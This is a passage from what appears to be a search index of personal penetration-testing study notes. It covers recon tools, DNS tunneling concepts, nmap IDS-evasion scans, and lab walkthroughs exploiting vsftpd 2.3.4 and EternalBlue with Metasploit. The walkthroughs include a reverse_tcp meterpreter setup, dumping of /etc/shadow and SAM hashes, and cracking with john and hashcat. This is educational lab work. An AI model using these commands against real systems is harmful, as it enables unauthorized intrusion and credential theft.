","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/02-reconnaissance/04-information-gathering-techniques-using-whois-recon-ng/","summary":"\u003ch2 id=\"gathering-data-using-whois\"\u003eGathering data using whois:\u003c/h2\u003e\n\u003cp\u003e\u003ccode\u003ewhois\u003c/code\u003e command helps us to find publicly available data about domains.\nThe following is a brief list of some information types that are usually stored for public\nrecords:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRegistrant contact information\u003c/li\u003e\n\u003cli\u003eAdministrative contact information\u003c/li\u003e\n\u003cli\u003eTechnical contact information\u003c/li\u003e\n\u003cli\u003eName servers\u003c/li\u003e\n\u003cli\u003eImportant dates, such as registration, update, and expiration dates\u003c/li\u003e\n\u003cli\u003eRegistry domain ID\u003c/li\u003e\n\u003cli\u003eRegistrar information\u003c/li\u003e\n\u003c/ul\u003e\n\u003col\u003e\n\u003cli\u003eKali is having a built-in \u003ccode\u003ewhois\u003c/code\u003e tool:\n\u003cimg alt=\"ig_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/04/ig_1.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\n            \u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition info\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 512 512\"\u003e\u003cpath d=\"M256 512A256 256 0 1 0 256 0a256 256 0 1 0 0 512zM216 336l24 0 0-64-24 0c-13.3 0-24-10.7-24-24s10.7-24 24-24l48 0c13.3 0 24 10.7 24 24l0 88 8 0c13.3 0 24 10.7 24 24s-10.7 24-24 24l-80 0c-13.3 0-24-10.7-24-24s10.7-24 24-24zm40-208a32 32 0 1 1 0 64 32 32 0 1 1 0-64z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eInfo\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eKeep in mind that, as the need for online privacy increases around the world, domain registrars and organizations are paying a premium fee to ensure their contact data is not revealed by WHOIS databases to the general public. This means that you will not commonly find private contact data about domains that are no longer being revealed on WHOIS databases if the domain owner pays the premium for additional privacy features.\u003c/p\u003e","title":"Whois \u0026 Recon-ng Framework"},{"content":"How does DNS tunneling works? It\u0026rsquo;s a step-by-step process that relies on the openness of DNS to carry other traffic without detection. Here\u0026rsquo;s how it works, step by step:\nThe attacker registers a domain\nThe domain, like badsite.com, is controlled by the attacker and points to a server they own. The attacker infects a computer\nThey use malware to gain control of a computer inside a target network. The computer becomes the client for the DNS tunnel. The client sends a DNS query\nThe infected computer encodes data in DNS queries. For example, it puts a secret value in the subdomain of a DNS request. The query reaches the DNS resolver\nThe DNS resolver forwards the request to the appropriate servers to resolve the domain name. The attacker\u0026rsquo;s server decodes the request\nThe attacker\u0026rsquo;s server receives the DNS request. It decodes the embedded data and can send back commands or other data in DNS responses. The server encodes a response\nThe attacker\u0026rsquo;s server encodes its own data as a DNS response. This could be an instruction for the infected computer to carry out. The client receives and decodes the response\nThe infected computer receives the DNS response from the resolver. It decodes the data and takes action as instructed. The process repeats as needed\nIf the data is too large for a single DNS message, the client and server split it into smaller parts. Each part is sent in its own DNS query or response. Attackers often use tools like iodine, dnscat2, and Cobalt Strike to perform DNS tunneling. Which handle the encoding and decoding of data within DNS packets.\nEssentially, DNS tunneling uses the trusted DNS protocol as a cover for sending hidden data. This lets attackers maintain a covert channel between a compromised system and their command server.\nCREDITS: paloaltonetworks_blog\nDifferent types of DNS tunneling attacks: Example: The SUNBURST malware, used in the SolarWinds breach (2020), included DNS-based C2 functionality. It used subdomain queries to pass encoded victim information to attacker-controlled nameservers. Example: In 2017, researchers uncovered DNSMessenger, a PowerShell-based backdoor that used DNS TXT records to exfiltrate data without writing files to disk.\nExample: OilRig, an APT group active since 2014, used DNS tunneling to map network structures and identify targets before escalating attacks.\nExample: Astrill VPN and HA Tunnel Plus both use DNS tunneling to bypass captive portals or ISP restrictions—often observed in enterprise and commercial travel networks.\nExample: The Decoy Dog campaign (2023) used DNS tunneling to deliver staged payloads. TXT and CNAME records were used to distribute encoded data back to infected hosts.\nFor mitigation, detection and prevention strategies follow the blog og Paloalto Networks.\nPRACRICAL COMING SOON FOR ADVANCE DNS C2 OPERATION USING dnscat2\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/08-post-exploitation-techniques/05-dns-tunneling/","summary":"\u003ch2 id=\"how-does-dns-tunneling-works\"\u003eHow does DNS tunneling works?\u003c/h2\u003e\n\u003cp\u003eIt\u0026rsquo;s a step-by-step process that relies on the openness of DNS to carry other traffic without detection.\n\u003cimg alt=\"dt_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/PE/05/dt_1.png\"\u003e\nHere\u0026rsquo;s how it works, step by step:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eThe attacker registers a domain\u003c/strong\u003e\u003cbr\u003e\nThe domain, like badsite.com, is controlled by the attacker and points to a server they own.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe attacker infects a computer\u003c/strong\u003e\u003cbr\u003e\nThey use malware to gain control of a computer inside a target network. The computer becomes the client for the DNS tunnel.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe client sends a DNS query\u003c/strong\u003e\u003cbr\u003e\nThe infected computer encodes data in DNS queries. For example, it puts a secret value in the subdomain of a DNS request.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe query reaches the DNS resolver\u003c/strong\u003e\u003cbr\u003e\nThe DNS resolver forwards the request to the appropriate servers to resolve the domain name.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe attacker\u0026rsquo;s server decodes the request\u003c/strong\u003e\u003cbr\u003e\nThe attacker\u0026rsquo;s server receives the DNS request. It decodes the embedded data and can send back commands or other data in DNS responses.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe server encodes a response\u003c/strong\u003e\u003cbr\u003e\nThe attacker\u0026rsquo;s server encodes its own data as a DNS response. This could be an instruction for the infected computer to carry out.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe client receives and decodes the response\u003c/strong\u003e\u003cbr\u003e\nThe infected computer receives the DNS response from the resolver. It decodes the data and takes action as instructed.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe process repeats as needed\u003c/strong\u003e\u003cbr\u003e\nIf the data is too large for a single DNS message, the client and server split it into smaller parts. Each part is sent in its own DNS query or response.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eAttackers often use tools like iodine, dnscat2, and Cobalt Strike to perform DNS tunneling. Which handle the encoding and decoding of data within DNS packets.\u003c/p\u003e","title":"DNS Tunneling"},{"content":"Whenever a packet is sent from one device to another, the source IP address is included within the header of the packet. This is the default behavior of the TCP/IP protocol stack.\nAvoiding detections using decoys: If you want to perform a scan on the target system at 172.30.1.134 and use the decoy feature of Nmap, we can use the –D syntax nmap target_ip -D DECOY_IP More nmap based IDS evasion scans: nmap -Pn -sV -p80,443 -f{IDS EVASION} --mtu 8 IP_ADDRESS nmap -Pn -sS -sV -p445,3389 -f --data-length 200 -D{decoy} GATEWAY_IP_FOR_DECOY ATTACKING_IP nmap -Pn -sS -sV -p445,3389 -f --data-length 200 -g 53 -D(decoy) GATEWAY_IP_FOR_DECOY ATTACKING_IP COMMAND BRIEFS:\nUtilizing fragmented packet so that IDS can\u0026rsquo;t analyze. MTU → Maximum Transmitted Unit → Data packet size minimum is 8 bytes. Second command uses the technique of decoy ips. We make the ip look like as if it\u0026rsquo;s coming from the Gateway itself by giving a decoy ip something like 192.168.0.1 . If we want to specify more than one decoy IP we can do that by seperating the decoy IPs with commas. We can even change the source port also to look less suspicious because normally a random port will be given for the packet transfer, so to avoid that we can use -g option and then specifying the port number we want to spoof. ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/05-evasion-techniques/","summary":"\u003cp\u003eWhenever a packet is sent from one device to another, the source IP address is included within the header of the packet. This is the default behavior of the TCP/IP protocol stack.\u003c/p\u003e\n\u003ch2 id=\"avoiding-detections-using-decoys\"\u003eAvoiding detections using decoys:\u003c/h2\u003e\n\u003cp\u003e\u003cimg alt=\"ev_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/05/ev_1.png\"\u003e\nIf you want to perform a scan on the target system at 172.30.1.134 and use the decoy feature of Nmap, we can use the \u003ccode\u003e–D\u003c/code\u003e syntax\n\u003cimg alt=\"ev_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/05/ev_2.png\"\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap target_ip -D DECOY_IP\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"more-nmap-based-ids-evasion-scans\"\u003eMore nmap based IDS evasion scans:\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -Pn -sV -p80,443 -f\u003cspan class=\"o\"\u003e{\u003c/span\u003eIDS EVASION\u003cspan class=\"o\"\u003e}\u003c/span\u003e --mtu \u003cspan class=\"m\"\u003e8\u003c/span\u003e IP_ADDRESS\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -Pn -sS -sV -p445,3389 -f --data-length \u003cspan class=\"m\"\u003e200\u003c/span\u003e -D\u003cspan class=\"o\"\u003e{\u003c/span\u003edecoy\u003cspan class=\"o\"\u003e}\u003c/span\u003e GATEWAY_IP_FOR_DECOY ATTACKING_IP\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -Pn -sS -sV -p445,3389 -f --data-length \u003cspan class=\"m\"\u003e200\u003c/span\u003e -g \u003cspan class=\"m\"\u003e53\u003c/span\u003e -D\u003cspan class=\"o\"\u003e(\u003c/span\u003edecoy\u003cspan class=\"o\"\u003e)\u003c/span\u003e GATEWAY_IP_FOR_DECOY ATTACKING_IP\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eCOMMAND BRIEFS:\u003c/p\u003e","title":"Evasion Techniques"},{"content":"Exploiting linux-based systems: Fire up metasploitanle 2 linux Scan the target using nmap: nmap -A -p 21 172.30.1.134 Nmap was able to identify the service version of the FTP service as vsFTPd 2.3.4 Search in google vsftpd 2.3.4 exploit ![[Pasted image 20251020125219.png]] We are having an exploit module from rapid7 itself Open up msfconsole sudo msfconsole msf6 \u0026gt; use exploit/unix/ftp/vsftpd_234_backdoor msf6 exploit(unix/ftp/vsftpd_234_backdoor) \u0026gt; set payload cmd/unix/ interact msf6 exploit(unix/ftp/vsftpd_234_backdoor) \u0026gt; set RHOSTS 172.30.1.20 msf6 exploit(unix/ftp/vsftpd_234_backdoor) \u0026gt; exploit 6. Upgrading shell using command python -c 'import pty; pty.spawn(\u0026quot;/bin/bash\u0026quot;)' 7. Got a root shell on the target system , dumped the /etc/shadow file where the hashes of the user\u0026rsquo;s passwords stored. 8. Save the credentials into a text file, make sure edit the unecessary users from the output: Format of a shadow password file Each line of the file contains nine fields that are separated by colons:\nUsername: User account and login name that exist in the system. Encrypted password: Password using the format $type$salt$hashed and eight to 12 characters long. Last password change. Date since Jan. 1, 1970, when the password was last changed. Minimum password age: The minimum number of days that must elapse before the password can be changed by the user. Maximum password age. The number of days after which the password must be changed. Warning period: The number of days before the password expires, during which time the user gets a warning to change the password. Inactivity period: The number of days post-expiration \u0026ndash; since Jan. 1, 1970 \u0026ndash; before the user\u0026rsquo;s account is disabled. Expiration date: The date on which the account was disabled. Unused. This field is left empty and reserved for future use. Next, we can use a popular password-cracking tool such as John the Ripper to perform offline password cracking to retrieve the plaintext password: john /home/kali/msf2_linux_user_hashes.txt --wordlist=/usr/ share/wordlists/rockyou.txt Exploiting windows based system: I am going to use a vulnerable vm named Blue which is having the vulnerability Eternal Blue aka MS17-010 Identifying it\u0026rsquo;s IP: Target machine: Scanning the target using nmap nmap -A -p 136-139,445 192.168.83.136 I am going to focus on port 136,139,445 , because the vulnerability is in SMB 139,445 -\u0026gt; SMB ports are open. We will try to identify the version of smb using metasploit sudo msfconsole use smb_version 6. Let\u0026rsquo;s check if the machine is vulnerable to ms17-010 It didn\u0026rsquo;t pick up the vulnerability, but the exploit did: 7. Now let\u0026rsquo;s use the exploit module:\nmsf6\u0026gt; use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) \u0026gt; set payload windows/x64/ meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) \u0026gt; set RHOSTS 192.168.83.136 msf6 exploit(windows/smb/ms17_010_eternalblue) \u0026gt; set LHOST 192.168.83.128 msf6 exploit(windows/smb/ms17_010_eternalblue) \u0026gt; exploit 8. Run some commands to check our privileges: 9. Next, use the hashdump command within Meterpreter to extract the contents of the Security Account Manager (SAM) file: The SAM file is found within Microsoft Windows operating systems in the %SystemRoot%/ system32/config/SAM directory and contains a record of all local user accounts, their Security Identifier (SID) values, and password hashes. you can identify the usernames as they are plaintext, the LAN Manager (LM), and New Technology LAN Manager (NTLM) password hashes for each local user account. The SAM file stores each user’s credentials in the following format: Username : Security Identifier (SID) : LM hash : NTLM hash Save the hashdump output into a txt file. Additionally, save the user Administrator with its LM and NTLM hashes into another text file, name it Blue_admin_user.txt, and use the following format: Administrator:aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5 Identifying the hash value type, starting with 58f5 of the admin hash is the hash value : hashid 58f5081696f366cdc72491a2c4996bd5 Important Keep in mind that Microsoft Windows operating systems do not store local users’ passwords in plaintext. Instead, they parse the plaintext password through a hashing algorithm such as NTLM, which performs a one-way function of converting the plaintext password into a cryptographic NTLM digest (hash). This process is non-reversible. The NTLM hash of each local user account is stored within the SAM file\nCracking hashes with hashcat: Identifying hash type of NTLM Command for cracking: hashcat -m 1000 /home/kali/Blue_pass_hashes.txt -a 0 /usr/share/wordlists/rockyou.txt # we can give one hash also hashcat -m 1000 \u0026#34;hash_value\u0026#34; /usr/share/wordlist/rockyou.txt setting up hashcat on host machine: Step 1: Install Dependencies Before you download Hashcat, you need to install two key dependencies:\nGPU Drivers: Hashcat uses your graphics card (GPU) for password cracking. You must install the latest drivers for your specific card. For NVIDIA GPUs: Download and install the latest CUDA Toolkit from the NVIDIA Developer website. For AMD/Intel GPUs: Download and install the latest Adrenalin Edition drivers from the AMD Support website. Using the \u0026ldquo;Auto-Detect and Install\u0026rdquo; tool is often the easiest option. Visual C++ Redistributable: Hashcat requires the Microsoft Visual C++ runtime libraries. Download and install the latest \u0026ldquo;Visual Studio 2015, 2017, 2019, and 2022\u0026rdquo; package from the official Microsoft website. Be sure to get the X64 version. Also install one library inside visual studio installer which is \u0026quot;Desktop development with C++\u0026quot; Install Your respective NVIDIA GPU DRIVER from NVIDIA-DRIVERS , select your GPU model and install it. After installing these, it\u0026rsquo;s a good idea to restart your computer.\nStep 2: Download and Extract Hashcat Go to the official Hashcat website. Download the binary version (it will be a .7z file). You will need a file archiver like 7-Zip (which is free) to extract the .7z file. Create a new folder in a simple location (like C:\\hashcat). Extract the contents of the downloaded .7z file into your new C:\\hashcat folder. Step 3: Run Hashcat Open the Start Menu, type cmd, and select Run as administrator. change directory to : cd hashcat/hashcat-7.1.2 3. To verify the installation and see all your connected devices (CPUs/GPUs), run a benchmark test:\nhashcat.exe -b You should see results like these: 4. After this run on your wordlists and hashes to crack:\nC:\\hashcat\\hashcat-7.1.2\u0026gt;hashcat.exe -m 1000 \u0026#34;C:\\Blue_pass_hashes.txt\u0026#34; C:\\rockyou.txt 5. checking on single hash:\nhashcat -m 1000 \u0026#34;7A21990FCD3D759941E45C490F143D5F\u0026#34; rockyou.txt ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/05-identifying-and-exploiting-vulnerable-services/","summary":"\u003ch2 id=\"exploiting-linux-based-systems\"\u003eExploiting linux-based systems:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eFire up \u003ccode\u003emetasploitanle 2 linux\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eScan the target using nmap:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -A -p \u003cspan class=\"m\"\u003e21\u003c/span\u003e 172.30.1.134\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"le_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/05/le_1.png\"\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNmap was able to identify the service version of the FTP service as vsFTPd 2.3.4\u003c/li\u003e\n\u003c/ul\u003e\n\u003col start=\"3\"\u003e\n\u003cli\u003eSearch in google \u003ccode\u003evsftpd 2.3.4 exploit\u003c/code\u003e\n![[Pasted image 20251020125219.png]]\u003c/li\u003e\n\u003cli\u003eWe are having an exploit module from \u003ccode\u003erapid7\u003c/code\u003e itself\n\u003cimg alt=\"le_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/05/le_2.png\"\u003e\u003c/li\u003e\n\u003cli\u003eOpen up \u003ccode\u003emsfconsole\u003c/code\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo msfconsole\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf6 \u0026gt; use exploit/unix/ftp/vsftpd_234_backdoor \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf6 exploit\u003cspan class=\"o\"\u003e(\u003c/span\u003eunix/ftp/vsftpd_234_backdoor\u003cspan class=\"o\"\u003e)\u003c/span\u003e \u0026gt; \u003cspan class=\"nb\"\u003eset\u003c/span\u003e payload cmd/unix/ interact \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf6 exploit\u003cspan class=\"o\"\u003e(\u003c/span\u003eunix/ftp/vsftpd_234_backdoor\u003cspan class=\"o\"\u003e)\u003c/span\u003e \u0026gt; \u003cspan class=\"nb\"\u003eset\u003c/span\u003e RHOSTS 172.30.1.20 msf6 exploit\u003cspan class=\"o\"\u003e(\u003c/span\u003eunix/ftp/vsftpd_234_backdoor\u003cspan class=\"o\"\u003e)\u003c/span\u003e \u0026gt; exploit\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"le_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/05/le_3.png\"\u003e\n6. Upgrading shell using command \u003ccode\u003epython -c 'import pty; pty.spawn(\u0026quot;/bin/bash\u0026quot;)'\u003c/code\u003e\n\u003cimg alt=\"le_4\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/05/le_4.png\"\u003e\n7. Got a root shell on the target system , dumped the \u003ccode\u003e/etc/shadow\u003c/code\u003e file where the hashes of the user\u0026rsquo;s passwords stored.\n\u003cimg alt=\"le_5\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/05/le_5.png\"\u003e\n8. Save the credentials into a text file, make sure edit the unecessary users from the output:\n\u003cimg alt=\"le_6\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/05/le_6.png\"\u003e\u003c/p\u003e","title":"Identifying and Exploiting Vulnerable Services"},{"content":"\nCommands: let\u0026rsquo;s gather the names of employees who work, or worked, at Microsoft and have a LinkedIn profile by using the following command: kali@kali  ~  theHarvester -d microsoft.com --dns-server 8.8.8.8 -b linkedin -d = : Specifies the target organization by using the domain name. --dns-server = : This allows you to specify a DNS server for all DNS queries. -b = Specifies the source to retrieve the information Sub-domain searching: kali@kali  ~  theHarvester -d microsoft.com -b bing ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/02-reconnaissance/05-the-harvester/","summary":"\u003cp\u003e\u003cimg alt=\"th_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/05/th_1.png\"\u003e\u003c/p\u003e\n\u003ch2 id=\"commands\"\u003eCommands:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003elet\u0026rsquo;s gather the names of employees who work, or worked, at Microsoft and have a LinkedIn profile by using the following command:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e kali@kali  ~  theHarvester -d microsoft.com --dns-server 8.8.8.8 -b linkedin\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e-d\u003c/code\u003e = : Specifies the target organization by using the domain name.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e--dns-server\u003c/code\u003e = : This allows you to specify a DNS server for all DNS queries.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e-b\u003c/code\u003e = Specifies the source to retrieve the information\u003c/li\u003e\n\u003c/ul\u003e\n\u003col start=\"2\"\u003e\n\u003cli\u003eSub-domain searching:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e kali@kali  ~  theHarvester -d microsoft.com -b bing \n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"th_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/05/th_2.png\"\u003e\u003c/p\u003e","title":"TheHarvester"},{"content":"COMING SOON\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/08-post-exploitation-techniques/06-bgp-hijack/","summary":"\u003cp\u003e\u003cem\u003eCOMING SOON\u003c/em\u003e\u003c/p\u003e","title":"BGP Hijacking"},{"content":"Employees of an organization often leak too much information about themselves and their company. While many employees are very happy to be working in their organizations, sometimes, they share information that can be used during cyberattacks by a threat actor. As an aspiring penetration tester, this information can also be leveraged during a penetration test on the target organization.\nThe following is some information that\u0026rsquo;s commonly leaked:\nEmployee contact information, such as telephone numbers and email addresses, that can be used during social engineering and account takeover attacks. Sharing photos with their employee badges, which can be used by a threat actor to create a fake ID for impersonation. Pictures of an employee\u0026rsquo;s computing systems and desktop, which can inform a threat actor about the available device vendors and operating systems. Projects that have been completed by the employee may contain specific technical details, which can allow a threat actor to profile the internal network infrastructure. Gathering information from instagram: Using sherlock --timeout command ensures that sherlock doesn\u0026rsquo;t spend more than 5 seconds on a site. Gathering company\u0026rsquo;s infra data: we can use tools like wappalyzer to see what kind of tech a target website is using: We can also utilize a website called built-with for getting the technology profile of a target website. Shodan: Shodan is a search engine for Internet of Things (IoT), systems, and networks that are directly connected to the internet. Ethical hackers, penetration testers, and even threat actors use Shodan to identify their organization\u0026rsquo;s or target\u0026rsquo;s assets, and they check whether they have been publicly exposed on the internet.\nGo to https://www.shodan.io Make an account and login first. Once logged in search for windows sevrer 2008 Then click one of those , this will provide additional information: Some port numbers for identification: Port 21: There\u0026rsquo;s a File Transfer Protocol (FTP) server. Port 53: This system is providing Domain Name System (DNS) services Port 80: There\u0026rsquo;s a web server on this device. Port 110: This device is providing Post Office Protocol 3 (POP3) services for email clients. Port 143: This system is running Internet Message Access Protocol 4 (IMAP4) services for email clients. Port 3389: Microsoft Remote Desktop Protocol (RDP) operates on this port by default, which means RDP is currently active. Port 8181: Provides email services over this port. Tip Sometimes shodan provides us with CVE(Common Vulnerabilities and Exposure) for particular machines that is connected through internet. It can be very helpful for penetration testers.\nCensys: Censys can gather intelligence on any publicly accessible system or network on the internet. To start gathering data about a target follow these steps:\nRegister on https://search.censys.io Then login Search for any query you need : I went to one of the machines and this provides me additional information : Maltego: Maltego is a graphical open source intelligence tool that was created by Paterva and is now maintained by Maltego Technologies. This tool helps ethical hackers and penetration testers quickly gather an organization\u0026rsquo;s infrastructure data by using a graphical interactive data mining application. This application can query and gather information from various sources on the internet and present data in easy-to-read graphs. These graphs provide visualizations of the relationships between each entity and the target.\nSign in to https://maltego.com Complete the whole form, after completion come to the kali desktop. Then search for maltego From the installer install maltego Then again search for maltego on the kali search bar, and open it. Your maltego setup wizard will open up. Log in with your maltego ID you setup onto the browser. After the setup, click on New button on the left corner: Entity palette: Onto the search bar search for Domain and drag and drop the Domain entity inside the graph: Double click on the dragged Domain entity and set your target domain name : To gather the Domain Name System (DNS) information about the domain, right-click on Domain entity and select DNS from Domain \u0026gt; To DNS Name – MX (mail server). Now maltego will find microsoft\u0026rsquo;s email server. To get the IP addresses of an object, such as the email server, right-click on the email server entity and select Resolve to IP. To discover the Name Server (NS) of a target domain, right-click on Domain Entity \u0026gt; DNS from domain \u0026gt; To DNS Name – NS (name server). To gather website information about the target domain, right-click on the Domain entity and select DNS from domain \u0026gt; To Website (Quick lookup). This will allow you to discover the target\u0026rsquo;s website address. To get a list of all the web links for the target\u0026rsquo;s website, right-click on the Website entity and select Links in and out of site. To get a list of publicly available email addresses that are associated with the target\u0026rsquo;s domain name, right-click on the Domain entity and select Email addresses from Domain. DONE Netcraft: Netcraft allows you to gather information about a target domain, such as network block information, registrar information, email contacts, the operating system of the hosting server, and the web platform.\nGo to https://searchdns.netcraft.com Search for the DNS you need. Click one of those onto the site report: More reading on OSINT: OSINT\nOSINT using perl: COMING SOON\nGoogle dorks: A list of well-known exploited Google dorks for information gathering can be found in a Google hacker\u0026rsquo;s database at http://www.exploit-db.com/google-dorks/.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/02-reconnaissance/06-social-media-recon/","summary":"\u003cp\u003eEmployees of an organization often leak too much information about themselves and their company. While many employees are very happy to be working in their organizations, sometimes, they share information that can be used during cyberattacks by a threat actor. As an aspiring penetration tester, this information can also be leveraged during a penetration test on the target organization.\u003c/p\u003e\n\u003cp\u003eThe following is some information that\u0026rsquo;s commonly leaked:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eEmployee contact information, such as telephone numbers and email addresses, that can be used during social engineering and account takeover attacks.\u003c/li\u003e\n\u003cli\u003eSharing photos with their employee badges, which can be used by a threat actor to create a fake ID for impersonation.\u003c/li\u003e\n\u003cli\u003ePictures of an employee\u0026rsquo;s computing systems and desktop, which can inform a threat actor about the available device vendors and operating systems.\u003c/li\u003e\n\u003cli\u003eProjects that have been completed by the employee may contain specific technical details, which can allow a threat actor to profile the internal network infrastructure.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"gathering-information-from-instagram\"\u003eGathering information from instagram:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUsing \u003ccode\u003esherlock\u003c/code\u003e \u003cimg alt=\"scm_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/06/scm_1.png\"\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e--timeout \u003c/code\u003e command ensures that \u003ccode\u003esherlock\u003c/code\u003e doesn\u0026rsquo;t spend more than 5 seconds on a site.\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003ch2 id=\"gathering-companys-infra-data\"\u003eGathering company\u0026rsquo;s infra data:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003ewe can use tools like \u003ccode\u003ewappalyzer\u003c/code\u003e to see what kind of tech a target website is using:\n\u003cimg alt=\"scm_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/06/scm_2.png\"\u003e\u003c/li\u003e\n\u003cli\u003eWe can also utilize a website called \u003ca href=\"https://builtwith.com\"\u003ebuilt-with\u003c/a\u003e for getting the technology profile of a target website.\n\u003cimg alt=\"scm_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/06/scm_3.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"shodan\"\u003eShodan:\u003c/h2\u003e\n\u003cp\u003eShodan is a search engine for Internet of Things (IoT), systems, and networks 